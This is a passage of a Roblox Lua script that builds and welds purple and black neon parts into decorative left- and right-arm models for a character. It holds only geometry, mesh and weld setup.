  1457. p23.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  1458. p23.CFrame = CFrame.new(63.5412827, 8.29912186, -14.2695541, 1.00045943, -5.54520193e-006, -2.12978443e-006, -7.22709638e-006, 0.999951601, 3.96298356e-006, -2.56507747e-006, 4.02606247e-006, 1.00038624)
  1459. p23.CanCollide = false
  1460. p23.Locked = true
  1461. p23.BottomSurface = Enum.SurfaceType.Smooth
  1462. p23.TopSurface = Enum.SurfaceType.Smooth
  1463. b15 = Instance.new("SpecialMesh", p23)
  1464. b15.MeshType = Enum.MeshType.Sphere
  1465. b15.Name = "Mesh"
  1466. p24 = Instance.new("Part", m)
  1467. p24.BrickColor = BrickColor.new("Really black")
  1468. p24.Material = Enum.Material.Neon
  1469. p24.FormFactor = Enum.FormFactor.Custom
  1470. p24.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  1471. p24.CFrame = CFrame.new(63.7413521, 9.49905682, -14.2695513, 1.00045943, -5.51538596e-006, -2.12978443e-006, -7.25689733e-006, 0.999951601, 3.96298356e-006, -2.56507769e-006, 4.02606247e-006, 1.00038624)
  1472. p24.CanCollide = false
  1473. p24.Locked = true
  1474. p24.BottomSurface = Enum.SurfaceType.Smooth
  1475. p24.TopSurface = Enum.SurfaceType.Smooth
  1476. b16 = Instance.new("SpecialMesh", p24)
  1477. b16.MeshType = Enum.MeshType.Sphere
  1478. b16.Name = "Mesh"
  1479. w1 = Instance.new("Weld", p1)
  1480. w1.Name = "Wedge_Weld"
  1481. w1.Part0 = p1
  1482. w1.C0 = CFrame.new(-13.7623367, 38.4686089, -47.5196228, 1.82382877e-007, -1.21785519e-007, -1.0000037, -0.707109988, 0.707106709, -1.20249211e-007, 0.707110047, 0.707106352, 1.16605563e-007)
  1483. w1.Part1 = p2
  1484. w1.C1 = CFrame.new(-12.5623302, 38.4686165, -47.5196419, 2.04734633e-007, -9.19831891e-008, -1.0000037, -0.707109928, 0.707106471, -1.25517531e-007, 0.707110047, 0.707106233, 1.65067799e-008)
  1485. w2 = Instance.new("Weld", p2)
  1486. w2.Name = "Wedge_Weld"
  1487. w2.Part0 = p2
  1488. w2.C0 = CFrame.new(-12.5623302, 38.4686165, -47.5196419, 2.04734633e-007, -9.19831891e-008, -1.0000037, -0.707109928, 0.707106471, -1.25517531e-007, 0.707110047, 0.707106233, 1.65067799e-008)
  1489. w2.Part1 = p3
  1490. w2.C1 = CFrame.new(-13.1623344, 38.4686127, -47.5196381, 2.04734619e-007, -9.1983182e-008, -1.0000037, -0.707109928, 0.707106471, -1.25517545e-007, 0.707110047, 0.707106233, 1.65067799e-008)
  1491. w3 = Instance.new("Weld", p3)
  1492. w3.Name = "Wedge_Weld"
  1493. w3.Part0 = p3
  1494. w3.C0 = CFrame.new(-13.1623344, 38.4686127, -47.5196381, 2.04734619e-007, -9.1983182e-008, -1.0000037, -0.707109928, 0.707106471, -1.25517545e-007, 0.707110047, 0.707106233, 1.65067799e-008)
  1495. w3.Part1 = p4
  1496. w3.C1 = CFrame.new(-13.1623335, 38.4686165, -47.5196266, 1.82382891e-007, -1.21785519e-007, -1.0000037, -0.707110047, 0.70710659, -1.20249197e-007, 0.707110107, 0.707106352, 1.16605577e-007)
  1497. w4 = Instance.new("Weld", p4)
  1498. w4.Name = "Wedge_Weld"
  1499. w4.Part0 = p4
  1500. w4.C0 = CFrame.new(-13.1623335, 38.4686165, -47.5196266, 1.82382891e-007, -1.21785519e-007, -1.0000037, -0.707110047, 0.70710659, -1.20249197e-007, 0.707110107, 0.707106352, 1.16605577e-007)
  1501. w4.Part1 = p5
  1502. w4.C1 = CFrame.new(13.1623335, -19.1215992, -57.7639008, -1.63937244e-007, 2.39803342e-007, 1.0000037, 0.422619939, -0.906307638, 1.72281261e-007, 0.906312168, 0.422617614, 8.41069863e-008)
  1503. w5 = Instance.new("Weld", p5)
  1504. w5.Name = "Wedge_Weld"
  1505. w5.Part0 = p5
  1506. w5.C0 = CFrame.new(13.1623335, -19.1215992, -57.7639008, -1.63937244e-007, 2.39803342e-007, 1.0000037, 0.422619939, -0.906307638, 1.72281261e-007, 0.906312168, 0.422617614, 8.41069863e-008)
  1507. w5.Part1 = p6
  1508. w5.C1 = CFrame.new(13.7623377, -19.1215973, -57.7639008, -1.63937244e-007, 2.39803342e-007, 1.0000037, 0.422619939, -0.906307638, 1.72281261e-007, 0.906312168, 0.422617614, 8.41069792e-008)
  1509. w6 = Instance.new("Weld", p6)
  1510. w6.Name = "Wedge_Weld"
  1511. w6.Part0 = p6
  1512. w6.C0 = CFrame.new(13.7623377, -19.1215973, -57.7639008, -1.63937244e-007, 2.39803342e-007, 1.0000037, 0.422619939, -0.906307638, 1.72281261e-007, 0.906312168, 0.422617614, 8.41069792e-008)
  1513. w6.Part1 = p7
  1514. w6.C1 = CFrame.new(12.5623283, -19.121603, -57.7638969, -1.63937244e-007, 2.39803342e-007, 1.0000037, 0.422619939, -0.906307638, 1.72281261e-007, 0.906312168, 0.422617614, 8.41069721e-008)
  1515. w7 = Instance.new("Weld", p7)
  1516. w7.Name = "Part_Weld"
  1517. w7.Part0 = p7
  1518. w7.C0 = CFrame.new(12.5623283, -19.121603, -57.7638969, -1.63937244e-007, 2.39803342e-007, 1.0000037, 0.422619939, -0.906307638, 1.72281261e-007, 0.906312168, 0.422617614, 8.41069721e-008)
  1519. w7.Part1 = p8
  1520. w7.C1 = CFrame.new(-62.1028557, -7.90003395, 14.2623377, 1.00000453, -2.44006515e-007, -3.7252903e-008, 1.71363354e-007, 0.999999285, -1.49011612e-008, -6.70552254e-008, 2.98023224e-008, 1.0000037)
  1521. w8 = Instance.new("Weld", p8)
  1522. w8.Name = "Part_Weld"
  1523. w8.Part0 = p8
  1524. w8.C0 = CFrame.new(-62.1028557, -7.90003395, 14.2623377, 1.00000453, -2.44006515e-007, -3.7252903e-008, 1.71363354e-007, 0.999999285, -1.49011612e-008, -6.70552254e-008, 2.98023224e-008, 1.0000037)
  1525. w8.Part1 = p9
  1526. w8.C1 = CFrame.new(-62.1028442, -5.2000351, 14.2623415, 1.00000429, -2.19451294e-007, 2.98023153e-008, 1.30103487e-007, 0.999999702, 5.96046448e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  1527. w9 = Instance.new("Weld", p9)
  1528. w9.Name = "Part_Weld"
  1529. w9.Part0 = p9
  1530. w9.C0 = CFrame.new(-62.1028442, -5.2000351, 14.2623415, 1.00000429, -2.19451294e-007, 2.98023153e-008, 1.30103487e-007, 0.999999702, 5.96046448e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  1531. w9.Part1 = p10
  1532. w9.C1 = CFrame.new(54.0845451, 31.7618942, 14.2623348, -0.906311929, 0.422618181, -1.82007653e-009, -0.422620118, -0.906307399, -6.66151578e-008, -4.47034836e-008, 5.96046448e-008, 1.0000037)
  1533. w10 = Instance.new("Weld", p10)
  1534. w10.Name = "Part_Weld"
  1535. w10.Part0 = p10
  1536. w10.C0 = CFrame.new(54.0845451, 31.7618942, 14.2623348, -0.906311929, 0.422618181, -1.82007653e-009, -0.422620118, -0.906307399, -6.66151578e-008, -4.47034836e-008, 5.96046448e-008, 1.0000037)
  1537. w10.Part1 = p11
  1538. w10.C1 = CFrame.new(55.4291229, -29.7103825, 14.2623348, -0.819155812, -0.573575914, -5.86004596e-008, 0.573578954, -0.8191517, -3.17313607e-008, -4.47034836e-008, 5.9604659e-008, 1.0000037)
  1539. w11 = Instance.new("Weld", p11)
  1540. w11.Name = "Part_Weld"
  1541. w11.Part0 = p11
  1542. w11.C0 = CFrame.new(55.4291229, -29.7103825, 14.2623348, -0.819155812, -0.573575914, -5.86004596e-008, 0.573578954, -0.8191517, -3.17313607e-008, -4.47034836e-008, 5.9604659e-008, 1.0000037)
  1543. w11.Part1 = p12
  1544. w11.C1 = CFrame.new(-62.7028465, -4.30003357, 14.2623425, 1.00000429, -2.08616257e-007, 2.980231e-008, 1.1920929e-007, 0.999999642, 5.16191463e-008, -5.96046341e-008, 2.98023224e-008, 1.00000381)
  1545. w12 = Instance.new("Weld", p12)
  1546. w12.Name = "Part_Weld"
  1547. w12.Part0 = p12
  1548. w12.C0 = CFrame.new(-62.7028465, -4.30003357, 14.2623425, 1.00000429, -2.08616257e-007, 2.980231e-008, 1.1920929e-007, 0.999999642, 5.16191463e-008, -5.96046341e-008, 2.98023224e-008, 1.00000381)
  1549. w12.Part1 = p13
  1550. w12.C1 = CFrame.new(-62.7657433, -8.200037, 13.2074499, 1.00000453, -2.98023224e-007, -3.72529421e-008, 1.49011612e-007, 0.999999285, -1.49011443e-008, -6.70552396e-008, 2.9802333e-008, 1.0000037)
  1551. w13 = Instance.new("Weld", p13)
  1552. w13.Name = "Part_Weld"
  1553. w13.Part0 = p13
  1554. w13.C0 = CFrame.new(-62.7657433, -8.200037, 13.2074499, 1.00000453, -2.98023224e-007, -3.72529421e-008, 1.49011612e-007, 0.999999285, -1.49011443e-008, -6.70552396e-008, 2.9802333e-008, 1.0000037)
  1555. w13.Part1 = p14
  1556. w13.C1 = CFrame.new(-62.7025757, -7.80003023, 14.2622833, 1, -8.94065622e-008, 4.47034871e-008, 8.94065622e-008, 1, -5.96044352e-008, -4.47034836e-008, 5.96044387e-008, 1)
  1557. w14 = Instance.new("Weld", p14)
  1558. w14.Name = "Part_Weld"
  1559. w14.Part0 = p14
  1560. w14.C0 = CFrame.new(-62.7025757, -7.80003023, 14.2622833, 1, -8.94065622e-008, 4.47034871e-008, 8.94065622e-008, 1, -5.96044352e-008, -4.47034836e-008, 5.96044387e-008, 1)
  1561. w14.Part1 = p15
  1562. w14.C1 = CFrame.new(-62.8028793, -6.2000289, 13.1623297, 1.00000465, -2.68220901e-007, 2.98023295e-008, 8.94069672e-008, 0.999999523, 5.9604659e-008, -4.47034836e-008, 5.9604659e-008, 1.0000037)
  1563. w15 = Instance.new("Weld", p15)
  1564. w15.Name = "Part_Weld"
  1565. w15.Part0 = p15
  1566. w15.C0 = CFrame.new(-62.8028793, -6.2000289, 13.1623297, 1.00000465, -2.68220901e-007, 2.98023295e-008, 8.94069672e-008, 0.999999523, 5.9604659e-008, -4.47034836e-008, 5.9604659e-008, 1.0000037)
  1567. w15.Part1 = p16
  1568. w15.C1 = CFrame.new(-62.9029045, -6.80003929, 14.2623367, 1.00000453, -2.08616257e-007, -3.72529385e-008, 1.1920929e-007, 0.999999404, -1.49011452e-008, -6.70552325e-008, 2.9802333e-008, 1.0000037)
  1569. w16 = Instance.new("Weld", p16)
  1570. w16.Name = "Part_Weld"
  1571. w16.Part0 = p16
  1572. w16.C0 = CFrame.new(-62.9029045, -6.80003929, 14.2623367, 1.00000453, -2.08616257e-007, -3.72529385e-008, 1.1920929e-007, 0.999999404, -1.49011452e-008, -6.70552325e-008, 2.9802333e-008, 1.0000037)
  1573. w16.Part1 = p17
  1574. w16.C1 = CFrame.new(52.1717262, 35.7280197, 14.2623415, -0.866029143, 0.499999821, 3.55271368e-015, -0.500002086, -0.86602509, -5.96046448e-008, -5.96046341e-008, 2.98023224e-008, 1.00000381)
  1575. w17 = Instance.new("Weld", p17)
  1576. w17.Name = "Part_Weld"
  1577. w17.Part0 = p17
  1578. w17.C0 = CFrame.new(52.1717262, 35.7280197, 14.2623415, -0.866029143, 0.499999821, 3.55271368e-015, -0.500002086, -0.86602509, -5.96046448e-008, -5.96046341e-008, 2.98023224e-008, 1.00000381)
  1579. w17.Part1 = p18
  1580. w17.C1 = CFrame.new(59.8312111, -21.1078911, 14.2623348, -0.906311929, -0.422617912, -5.22000931e-008, 0.422620177, -0.906307578, -4.1425146e-008, -4.47034836e-008, 5.96046448e-008, 1.0000037)
  1581. w18 = Instance.new("Weld", p18)
  1582. w18.Name = "Part_Weld"
  1583. w18.Part0 = p18
  1584. w18.C0 = CFrame.new(59.8312111, -21.1078911, 14.2623348, -0.906311929, -0.422617912, -5.22000931e-008, 0.422620177, -0.906307578, -4.1425146e-008, -4.47034836e-008, 5.96046448e-008, 1.0000037)
  1585. w18.Part1 = p19
  1586. w18.C1 = CFrame.new(49.2864532, -40.0483932, 14.2623358, -0.707110107, -0.707106173, -6.32202841e-008, 0.707109928, -0.70710659, -2.1073431e-008, -4.47034836e-008, 5.9604659e-008, 1.0000037)
  1587. w19 = Instance.new("Weld", p19)
  1588. w19.Name = "Part_Weld"
  1589. w19.Part0 = p19
  1590. w19.C0 = CFrame.new(49.2864532, -40.0483932, 14.2623358, -0.707110107, -0.707106173, -6.32202841e-008, 0.707109928, -0.70710659, -2.1073431e-008, -4.47034836e-008, 5.9604659e-008, 1.0000037)
  1591. w19.Part1 = p20
  1592. w19.C1 = CFrame.new(28.8318367, -56.7515907, 14.2622824, -0.342020333, -0.939692557, 4.07203444e-008, 0.939692557, -0.342020333, 6.23934611e-008, -4.47034836e-008, 5.96044387e-008, 1)
  1593. w20 = Instance.new("Weld", p20)
  1594. w20.Name = "Part_Weld"
  1595. w20.Part0 = p20
  1596. w20.C0 = CFrame.new(28.8318367, -56.7515907, 14.2622824, -0.342020333, -0.939692557, 4.07203444e-008, 0.939692557, -0.342020333, 6.23934611e-008, -4.47034836e-008, 5.96044387e-008, 1)
  1597. w20.Part1 = p21
  1598. w20.C1 = CFrame.new(-39.764328, -49.7778244, 14.2622843, 0.707105696, -0.707107842, 7.39707531e-008, 0.707107842, 0.707105696, 8.91225582e-009, -5.86070712e-008, 4.60033966e-008, 1)
  1599. w21 = Instance.new("Weld", p21)
  1600. w21.Name = "Part_Weld"
  1601. w21.Part0 = p21
  1602. w21.C0 = CFrame.new(-39.764328, -49.7778244, 14.2622843, 0.707105696, -0.707107842, 7.39707531e-008, 0.707107842, 0.707105696, 8.91225582e-009, -5.86070712e-008, 4.60033966e-008, 1)
  1603. w21.Part1 = p22
  1604. w21.C1 = CFrame.new(-63.402874, -5.50003099, 14.2623358, 1.00000453, -2.99885869e-007, 2.98023224e-008, 7.4505806e-008, 0.999999642, 5.96046448e-008, -4.47034836e-008, 5.96046448e-008, 1.0000037)
  1605. w22 = Instance.new("Weld", p22)
  1606. w22.Name = "Part_Weld"
  1607. w22.Part0 = p22
  1608. w22.C0 = CFrame.new(-63.402874, -5.50003099, 14.2623358, 1.00000453, -2.99885869e-007, 2.98023224e-008, 7.4505806e-008, 0.999999642, 5.96046448e-008, -4.47034836e-008, 5.96046448e-008, 1.0000037)
  1609. w22.Part1 = p23
  1610. w22.C1 = CFrame.new(-63.502594, -6.30003357, 14.2622824, 1, -5.96043641e-008, 4.47034836e-008, 5.96043677e-008, 1, -5.9604421e-008, -4.470348e-008, 5.96044245e-008, 1)
  1611. w23 = Instance.new("Weld", p23)
  1612. w23.Name = "Part_Weld"
  1613. w23.Part0 = p23
  1614. w23.C0 = CFrame.new(-63.502594, -6.30003357, 14.2622824, 1, -5.96043641e-008, 4.47034836e-008, 5.96043677e-008, 1, -5.9604421e-008, -4.470348e-008, 5.96044245e-008, 1)
  1615. w23.Part1 = p24
  1616. w23.C1 = CFrame.new(-63.7025795, -7.50003004, 14.2622843, 1, -8.94065622e-008, 4.47034871e-008, 8.94065622e-008, 1, -5.96044352e-008, -4.47034836e-008, 5.96044387e-008, 1)
  1617. w24 = Instance.new("Weld", p24)
  1618. w24.Name = "Part_Weld"
  1619. w24.Part0 = p24
  1620. w24.C0 = CFrame.new(-63.7025795, -7.50003004, 14.2622843, 1, -8.94065622e-008, 4.47034871e-008, 8.94065622e-008, 1, -5.96044352e-008, -4.47034836e-008, 5.96044387e-008, 1)
  1621. m.Parent = larm
  1622. m:MakeJoints()
  1623. ----------------------------------------------------
  1624. local cor3 = Instance.new("Part", larm.LeftArm)
  1625. cor3.Name = "Thingy"
  1626. cor3.Locked = true
  1627. cor3.BottomSurface = 0
  1628. cor3.CanCollide = false
  1629. cor3.Size = Vector3.new(2, 1, 1)
  1630. cor3.Transparency = 1
  1631. cor3.TopSurface = 0
  1632. corw2 = Instance.new("Weld", cor3)
  1633. corw2.Part0 = larm
  1634. corw2.Part1 = cor3
  1635. corw2.C0 = CFrame.new(0, 0, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(0))
  1636. corw2.C1 = CFrame.new(0, 0, 0)
  1637. weld2 = Instance.new("Weld", larm.LeftArm)
  1638. weld2.Part0 = cor3
  1639. weld2.Part1 = p15
  1640. weld2.C0 = CFrame.new(0, 0, 0)
  1641. ----------------------------------------------------
  1642. local m = Instance.new("Model")
  1643. m.Name = "RightArm"
  1644. p1 = Instance.new("WedgePart", m)
  1645. p1.BrickColor = BrickColor.new("Royal purple")
  1646. p1.Material = Enum.Material.Neon
  1647. p1.Name = "Wedge"
  1648. p1.FormFactor = Enum.FormFactor.Custom
  1649. p1.Size = Vector3.new(1, 1.19999981, 3.30000019)
  1650. p1.CFrame = CFrame.new(71.7528229, 9.08148766, -13.7657108, 2.20961255e-007, -0.422704399, -0.906498253, -1.70178805e-006, -0.906287491, 0.422612786, -1.00018191, -1.16194826e-006, 2.39246219e-006)
  1651. p1.CanCollide = false
  1652. p1.Locked = true
  1653. p1.TopSurface = Enum.SurfaceType.Smooth
  1654. b1 = Instance.new("SpecialMesh", p1)
  1655. b1.MeshType = Enum.MeshType.Wedge
  1656. b1.Name = "Mesh"
  1657. b1.Scale = Vector3.new(0.200000003, 1, 1)
  1658. p2 = Instance.new("WedgePart", m)
  1659. p2.BrickColor = BrickColor.new("Royal purple")
  1660. p2.Material = Enum.Material.Neon
  1661. p2.Name = "Wedge"
  1662. p2.FormFactor = Enum.FormFactor.Custom
  1663. p2.Size = Vector3.new(1, 1.19999981, 3.30000019)
  1664. p2.CFrame = CFrame.new(71.7534714, 9.08147335, -12.5655851, 3.25293399e-007, -0.422708124, -0.906506479, -1.7167032e-006, -0.906286299, 0.422612339, -1.0001893, -1.13135729e-006, 2.49332743e-006)
  1665. p2.CanCollide = false
  1666. p2.Locked = true
  1667. p2.TopSurface = Enum.SurfaceType.Smooth
  1668. b2 = Instance.new("SpecialMesh", p2)
  1669. b2.MeshType = Enum.MeshType.Wedge
  1670. b2.Name = "Mesh"
  1671. b2.Scale = Vector3.new(0.200000003, 1, 1)
  1672. p3 = Instance.new("WedgePart", m)
  1673. p3.BrickColor = BrickColor.new("Royal purple")
  1674. p3.Material = Enum.Material.Neon
  1675. p3.Name = "Wedge"
  1676. p3.FormFactor = Enum.FormFactor.Custom
  1677. p3.Size = Vector3.new(1, 1.19999981, 3.30000019)
  1678. p3.CFrame = CFrame.new(71.7541199, 9.08145237, -13.1658068, 4.29627249e-007, -0.422711849, -0.906514704, -1.73161834e-006, -0.906285107, 0.422611892, -1.0001967, -1.10076587e-006, 2.59419403e-006)
  1679. p3.CanCollide = false
  1680. p3.Locked = true
  1681. p3.TopSurface = Enum.SurfaceType.Smooth
  1682. b3 = Instance.new("SpecialMesh", p3)
  1683. b3.MeshType = Enum.MeshType.Wedge
  1684. b3.Name = "Mesh"
  1685. b3.Scale = Vector3.new(0.200000003, 1, 1)
  1686. p4 = Instance.new("WedgePart", m)
  1687. p4.BrickColor = BrickColor.new("Royal purple")
  1688. p4.Material = Enum.Material.Neon
  1689. p4.Name = "Wedge"
  1690. p4.FormFactor = Enum.FormFactor.Custom
  1691. p4.Size = Vector3.new(1, 1.19999981, 4)
  1692. p4.CFrame = CFrame.new(71.4245453, 8.39948177, -13.7660398, -5.32960883e-007, 0.70726943, -0.707265258, 1.90324067e-006, 0.707083881, 0.707096815, 1.0001967, 9.87842554e-008, 2.61978244e-006)
  1693. p4.CanCollide = false
  1694. p4.Locked = true
  1695. p4.TopSurface = Enum.SurfaceType.Smooth
  1696. b4 = Instance.new("SpecialMesh", p4)
  1697. b4.MeshType = Enum.MeshType.Wedge
  1698. b4.Name = "Mesh"
  1699. b4.Scale = Vector3.new(0.200000003, 1, 1)
  1700. p5 = Instance.new("WedgePart", m)
  1701. p5.BrickColor = BrickColor.new("Royal purple")
  1702. p5.Material = Enum.Material.Neon
  1703. p5.Name = "Wedge"
  1704. p5.FormFactor = Enum.FormFactor.Custom
  1705. p5.Size = Vector3.new(1, 1.19999981, 4)
  1706. p5.CFrame = CFrame.new(71.4251862, 8.39946651, -13.1660223, -6.3729243e-007, 0.707273066, -0.707261622, 1.91814229e-006, 0.707080245, 0.707100451, 1.0001967, 1.62003985e-007, 2.53547341e-006)
  1707. p5.CanCollide = false
  1708. p5.Locked = true
  1709. p5.TopSurface = Enum.SurfaceType.Smooth
  1710. b5 = Instance.new("SpecialMesh", p5)
  1711. b5.MeshType = Enum.MeshType.Wedge
  1712. b5.Name = "Mesh"
  1713. b5.Scale = Vector3.new(0.200000003, 1, 1)
  1714. p6 = Instance.new("WedgePart", m)
  1715. p6.BrickColor = BrickColor.new("Royal purple")
  1716. p6.Material = Enum.Material.Neon
  1717. p6.Name = "Wedge"
  1718. p6.FormFactor = Enum.FormFactor.Custom
  1719. p6.Size = Vector3.new(1, 1.19999981, 4)
  1720. p6.CFrame = CFrame.new(71.4258194, 8.39945126, -12.5660009, -7.41623865e-007, 0.707276702, -0.707257986, 1.93304436e-006, 0.707076609, 0.707104087, 1.0001967, 2.25224142e-007, 2.45116462e-006)
  1721. p6.CanCollide = false
  1722. p6.Locked = true
  1723. p6.TopSurface = Enum.SurfaceType.Smooth
  1724. b6 = Instance.new("SpecialMesh", p6)
  1725. b6.MeshType = Enum.MeshType.Wedge
  1726. b6.Name = "Mesh"
  1727. b6.Scale = Vector3.new(0.200000003, 1, 1)
  1728. p7 = Instance.new("Part", m)
  1729. p7.BrickColor = BrickColor.new("Really black")
  1730. p7.Material = Enum.Material.Neon
  1731. p7.FormFactor = Enum.FormFactor.Custom
  1732. p7.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  1733. p7.CFrame = CFrame.new(70.3255081, 6.6994977, -14.2663507, 1.00023162, 1.31726265e-005, -7.92685455e-007, -1.94311142e-005, 0.999976158, 1.97985287e-006, -1.62725564e-006, 1.86058458e-006, 1.00020039)
  1734. p7.CanCollide = false
  1735. p7.Locked = true
  1736. p7.BottomSurface = Enum.SurfaceType.Smooth
  1737. p7.TopSurface = Enum.SurfaceType.Smooth
  1738. b7 = Instance.new("SpecialMesh", p7)
  1739. b7.MeshType = Enum.MeshType.Sphere
  1740. b7.Name = "Mesh"
  1741. p8 = Instance.new("Part", m)
  1742. p8.BrickColor = BrickColor.new("Royal purple")
  1743. p8.Material = Enum.Material.Neon
  1744. p8.FormFactor = Enum.FormFactor.Custom
  1745. p8.Size = Vector3.new(0.200000048, 0.999999881, 0.200000048)
  1746. p8.CFrame = CFrame.new(70.0060196, 9.16293144, -14.2664633, 0.881308079, -0.429463804, -0.198316693, 0.401435703, 0.900625467, -0.166355878, 0.250050306, 0.0670034215, 0.966122985)
  1747. p8.CanCollide = false
  1748. p8.Locked = true
  1749. p8.BottomSurface = Enum.SurfaceType.Smooth
  1750. p8.TopSurface = Enum.SurfaceType.Smooth
  1751. p9 = Instance.new("Part", m)
  1752. p9.BrickColor = BrickColor.new("Really black")
  1753. p9.Material = Enum.Material.Neon
  1754. p9.FormFactor = Enum.FormFactor.Custom
  1755. p9.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  1756. p9.CFrame = CFrame.new(70.2268219, 8.59942532, -14.2665701, 1.00024557, 1.30422413e-005, -8.7916851e-007, -1.95577741e-005, 0.999974489, 1.9967556e-006, -1.75833702e-006, 2.01165676e-006, 1.00021148)
  1757. p9.CanCollide = false
  1758. p9.Locked = true
  1759. p9.BottomSurface = Enum.SurfaceType.Smooth
  1760. p9.TopSurface = Enum.SurfaceType.Smooth
  1761. b8 = Instance.new("SpecialMesh", p9)
  1762. b8.MeshType = Enum.MeshType.Sphere
  1763. b8.Name = "Mesh"
  1764. p10 = Instance.new("Part", m)
  1765. p10.BrickColor = BrickColor.new("Really black")
  1766. p10.Material = Enum.Material.Neon
  1767. p10.FormFactor = Enum.FormFactor.Custom
  1768. p10.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  1769. p10.CFrame = CFrame.new(69.8274002, 9.5993948, -14.266675, 1.00025487, 1.30049675e-005, -9.23888138e-007, -1.9595207e-005, 0.999973536, 2.11597762e-006, -1.80306665e-006, 2.13088947e-006, 1.00021887)
  1770. p10.CanCollide = false
  1771. p10.Locked = true
  1772. p10.BottomSurface = Enum.SurfaceType.Smooth
  1773. p10.TopSurface = Enum.SurfaceType.Smooth
  1774. b9 = Instance.new("SpecialMesh", p10)
  1775. b9.MeshType = Enum.MeshType.Sphere
  1776. b9.Name = "Mesh"
  1777. p11 = Instance.new("Part", m)
  1778. p11.BrickColor = BrickColor.new("Royal purple")
  1779. p11.Material = Enum.Material.Neon
  1780. p11.FormFactor = Enum.FormFactor.Custom
  1781. p11.Size = Vector3.new(0.200000048, 1.79999983, 0.200000048)
  1782. p11.CFrame = CFrame.new(69.693718, 7.37976837, -14.2265854, 0.690841019, -0.711695194, -0.129447505, 0.678571701, 0.699464202, -0.224133074, 0.250056893, 0.0670053288, 0.966144204)
  1783. p11.CanCollide = false
  1784. p11.Locked = true
  1785. p11.BottomSurface = Enum.SurfaceType.Smooth
  1786. p11.TopSurface = Enum.SurfaceType.Smooth
  1787. p12 = Instance.new("Part", m)
  1788. p12.BrickColor = BrickColor.new("Royal purple")
  1789. p12.Material = Enum.Material.Neon
  1790. p12.FormFactor = Enum.FormFactor.Custom
  1791. p12.Size = Vector3.new(0.200000048, 1.5999999, 0.200000048)
  1792. p12.CFrame = CFrame.new(69.47966, 8.73308277, -14.2467909, 0.176576898, -0.984305978, 0.022559464, 0.951990068, 0.164877579, -0.257825077, 0.25006038, 0.0670051575, 0.966151059)
  1793. p12.CanCollide = false
  1794. p12.Locked = true
  1795. p12.BottomSurface = Enum.SurfaceType.Smooth
  1796. p12.TopSurface = Enum.SurfaceType.Smooth
  1797. p13 = Instance.new("Part", m)
  1798. p13.BrickColor = BrickColor.new("Royal purple")
  1799. p13.Material = Enum.Material.Neon
  1800. p13.FormFactor = Enum.FormFactor.Custom
  1801. p13.Size = Vector3.new(1.5, 1.5, 1.5)
  1802. p13.CFrame = CFrame.new(69.3920746, 10.1993351, -13.2118578, 1.00028241, 1.27716921e-005, -1.06170774e-006, -1.99186616e-005, 0.999970496, 2.39908695e-006, -1.93528831e-006, 2.38418579e-006, 1.00024128)
  1803. p13.CanCollide = false
  1804. p13.Locked = true
  1805. p13.BottomSurface = Enum.SurfaceType.Smooth
  1806. p13.TopSurface = Enum.SurfaceType.Smooth
  1807. b10 = Instance.new("SpecialMesh", p13)
  1808. b10.MeshType = Enum.MeshType.Sphere
  1809. b10.Name = "Mesh"
  1810. p14 = Instance.new("Part", m)
  1811. p14.BrickColor = BrickColor.new("Really black")
  1812. p14.Material = Enum.Material.Metal
  1813. p14.Name = "Main"
  1814. p14.FormFactor = Enum.FormFactor.Custom
  1815. p14.Size = Vector3.new(2.20000005, 4.19999981, 2.20000005)
  1816. p14.CFrame = CFrame.new(69.4298401, 8.19937706, -13.1668339, 1.00029147, 1.25630004e-005, -1.16605349e-006, -2.0008245e-005, 0.999969125, 2.41400744e-006, -2.03963987e-006, 2.39908786e-006, 1.00024867)
  1817. p14.CanCollide = false
  1818. p14.Locked = true
  1819. p14.BottomSurface = Enum.SurfaceType.Smooth
  1820. p14.TopSurface = Enum.SurfaceType.Smooth
  1821. p15 = Instance.new("Part", m)
  1822. p15.BrickColor = BrickColor.new("Really black")
  1823. p15.Material = Enum.Material.Neon
  1824. p15.FormFactor = Enum.FormFactor.Custom
  1825. p15.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  1826. p15.CFrame = CFrame.new(69.1303406, 7.89936399, -14.2672224, 1.00030053, 1.24437429e-005, -1.24804228e-006, -2.02170359e-005, 0.999968052, 2.45872889e-006, -2.07692119e-006, 2.48851507e-006, 1.00025606)
  1827. p15.CanCollide = false
  1828. p15.Locked = true
  1829. p15.BottomSurface = Enum.SurfaceType.Smooth
  1830. p15.TopSurface = Enum.SurfaceType.Smooth
  1831. b11 = Instance.new("SpecialMesh", p15)
  1832. b11.MeshType = Enum.MeshType.Sphere
  1833. b11.Name = "Mesh"
  1834. p16 = Instance.new("Part", m)
  1835. p16.BrickColor = BrickColor.new("Royal purple")
  1836. p16.Material = Enum.Material.Neon
  1837. p16.FormFactor = Enum.FormFactor.Custom
  1838. p16.Size = Vector3.new(0.200000048, 0.899999857, 0.200000048)
  1839. p16.CFrame = CFrame.new(68.9101486, 8.4345789, -14.2572756, 0.881372392, -0.429496199, -0.198331535, 0.401431859, 0.900618315, -0.166353673, 0.250065029, 0.0670081601, 0.966180325)
  1840. p16.CanCollide = false
  1841. p16.Locked = true
  1842. p16.BottomSurface = Enum.SurfaceType.Smooth
  1843. p16.TopSurface = Enum.SurfaceType.Smooth
  1844. p17 = Instance.new("Part", m)
  1845. p17.BrickColor = BrickColor.new("Royal purple")
  1846. p17.Material = Enum.Material.Neon
  1847. p17.FormFactor = Enum.FormFactor.Custom
  1848. p17.Size = Vector3.new(0.200000048, 0.599999785, 0.200000048)
  1849. p17.CFrame = CFrame.new(68.8972092, 7.71862125, -14.2674294, -0.70732069, -0.707330942, -1.25169754e-006, 0.707094371, -0.707072854, 2.48849392e-006, 3.42912972e-006, -4.32133675e-007, 1.00026357)
  1850. p17.CanCollide = false
  1851. p17.Locked = true
  1852. p17.BottomSurface = Enum.SurfaceType.Smooth
  1853. p17.TopSurface = Enum.SurfaceType.Smooth
  1854. p18 = Instance.new("Part", m)
  1855. p18.BrickColor = BrickColor.new("Really black")
  1856. p18.Material = Enum.Material.Neon
  1857. p18.FormFactor = Enum.FormFactor.Custom
  1858. p18.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
